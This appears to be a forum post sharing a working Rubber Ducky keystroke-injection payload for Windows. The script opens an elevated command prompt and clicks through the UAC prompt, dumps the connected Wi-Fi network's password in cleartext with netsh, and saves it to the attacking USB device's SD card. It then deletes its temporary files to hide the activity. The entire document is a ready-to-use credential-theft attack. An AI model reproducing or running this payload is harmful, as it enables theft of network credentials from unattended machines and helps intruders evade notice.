[Payload] Windows wifi password grabber save to SD

[silent_noise]

**This is my mod to the original by Siem. I changed it to save to the SD card while running twin duck software. I used code from different sources and compiled it as I am still learning.

REM Title: WiFi password grabber save to twin duck SD
REM Author: silent_noise
REM Original by: Siem
REM Description: Saves the SSID, Network type, Authentication and the password to Log.txt. Then saves to the CD card on the twin duck
REM requires Twin Duck firmware and SD card to be named "DUCKY"

REM Adjust time for driver install
DELAY 3000

REM  Minimize all windows
WINDOWS d

REM  Open cmd & bypass UAC
DELAY 500
WINDOWS r
DELAY 200
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 500
ALT y
DELAY 600

REM Define DUCKY drive as %duck%
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
ENTER
DELAY 100

REM Getting SSID
STRING cd "%USERPROFILE%\Desktop" & for /f "tokens=2 delims=: " %A in ('netsh wlan show interface ^| findstr "SSID" ^| findstr /v "BSSID"') do set A=%A
ENTER

REM Creating A.txt
STRING netsh wlan show profiles %A% key=clear | findstr /c:"Network type" /c:"Authentication" /c:"Key Content" | findstr /v "broadcast" | findstr /v "Radio">>A.txt
ENTER

REM Get network type
STRING for /f "tokens=3 delims=: " %A in ('findstr "Network type" A.txt') do set B=%A
ENTER

REM Get authentication
STRING for /f "tokens=2 delims=: " %A in ('findstr "Authentication" A.txt') do set C=%A
ENTER

REM Get password
STRING for /f "tokens=3 delims=: " %A in ('findstr "Key Content" A.txt') do set D=%A
ENTER

REM  Delete A.txt
STRING del A.txt
ENTER

REM  Create Log.txt
STRING echo SSID: %A%>>Log.txt & echo Network type: %B%>>Log.txt & echo Authentication: %C%>>Log.txt & echo Password: %D%>>Log.txt
ENTER
DELAY 100

REM Send Log.txt to sd card
STRING copy Log.txt  %duck%\%computername%-wifi-passwords.txt
ENTER
DELAY 500

REM  Delete Log.txt and exit
STRING del Log.txt & exit
ENTER